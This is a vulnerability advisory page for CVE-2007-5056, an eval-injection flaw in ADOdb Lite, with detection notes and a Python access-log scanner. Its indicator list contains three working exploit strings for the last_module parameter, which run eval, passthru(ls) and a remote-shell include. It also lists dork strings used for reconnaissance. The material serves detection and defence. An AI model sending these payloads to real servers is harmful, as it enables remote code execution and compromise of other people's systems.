CVE-2007-5056
published 2007-09-24

CVE-2007-5056: Eval injection vulnerability in adodb-perf-module.inc.php in ADOdb Lite 1.42 and earlier, as used in products including CMS Made Simple, SAPID CMF…

Priority: P3 53 · medium · 6.8 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 27.87% (97.9th percentile)
Eval injection vulnerability in adodb-perf-module.inc.php in ADOdb Lite 1.42 and earlier, as used in products including CMS Made Simple, SAPID CMF, Journalness, PacerCMS, and Open-Realty, allows remote attackers to execute arbitrary code via PHP sequences in the last_module parameter.

Affected

1 ranges

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| adodb_lite | adodb_lite | <= 1.42 | |

Detection & IOCs (extracted from sources)

path: /lib/adodb_lite/adodb-perf-module.inc.php
path: /includes/adodb_lite/adodb-perf-module.inc.php
path: /vendors/adodb_lite/adodb-perf-module.inc.php
filename: adodb-perf-module.inc.php
command: last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=phpinfo();
command: last_module=t{};%20class%20t{};passthru(ls);//
command: last_module=t{};%20class%20t{};include(URL-SHELL);//
  • Monitor HTTP requests targeting adodb-perf-module.inc.php with a `last_module` parameter containing PHP class injection patterns (e.g., `{}`, `eval`, `passthru`, `include`) — these are the direct exploit vectors for this eval-injection vulnerability.
  • The vulnerable eval statement is `eval('class perfmon_parent_EXTENDER extends ' . $last_module . '_ADOConnection { }');` — alert on any request where `last_module` contains characters such as `{`, `}`, `;`, or known PHP function names.
  • Exploitation requires `register_globals = On` in php.ini; environments with this setting enabled and the vulnerable file publicly accessible are at highest risk.
  • Search web server logs for the dork string `Powered by PacerCMS` combined with requests to `adodb-perf-module.inc.php` to identify reconnaissance activity preceding exploitation.
  • Search web server logs for the dork string `Powered by SAPID CMF Build 87` combined with requests to `adodb-perf-module.inc.php` to identify reconnaissance activity preceding exploitation.
  • Search web server logs for the dork string `powered by CMS Made Simple version 1.1.2` combined with requests to `adodb-perf-module.inc.php` to identify reconnaissance activity preceding exploitation.
  • Exploitation is only possible when PHP's `register_globals` directive is enabled (`On`), which allows the `last_module` GET parameter to be injected directly into the eval call. Systems with `register_globals = Off` are not exploitable via this vector.
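
The log check described in the bullets above, as an added example (not code from this page or from ADOdb Lite). It assumes combined-format access logs; the `classify` and `scan` names, the `direct-access` label and the identifier allowlist are choices made for this example, and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, unquote_plus

TARGET = "adodb-perf-module.inc.php"
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# The eval builds "<last_module>_ADOConnection" as a class name, so a
# legitimate value can only be identifier characters (allowlist, assumption).
IDENTIFIER = re.compile(r"[A-Za-z0-9_]*\Z")

def decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are normalised."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return None, 'direct-access' or 'injection' for one access-log line."""
    match = REQUEST.search(line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith("/" + TARGET):
        return None
    verdict = "direct-access"  # include file requested directly: worth a look
    # Split on '&' only; the payloads contain ';', which must stay in the value.
    for pair in url.query.split("&"):
        name, _, value = pair.partition("=")
        if decode(name) == "last_module" and not IDENTIFIER.match(decode(value)):
            verdict = "injection"
    return verdict

def scan(lines):
    """Return (verdict, client address) for every line that matches."""
    return [(v, line.split()[0]) for line in lines if (v := classify(line))]

# Constructed sample lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=1 HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=mysql HTTP/1.1" 200 0',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /includes/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};passthru(ls);// HTTP/1.1" 200 431',
    '198.51.100.7 - - [01/Jan/2024:10:01:09 +0000] "GET /vendors/adodb_lite/adodb-perf-module.inc.php?last_module=t%257B%257D%253B HTTP/1.0" 200 0',
]

if __name__ == "__main__":
    for verdict, client in scan(SAMPLE_LOG):
        print(verdict, client)
```

Access logs record only the query string; with `register_globals = On` the same variable can also arrive in a POST body or cookie, which needs WAF or application-level logging to see.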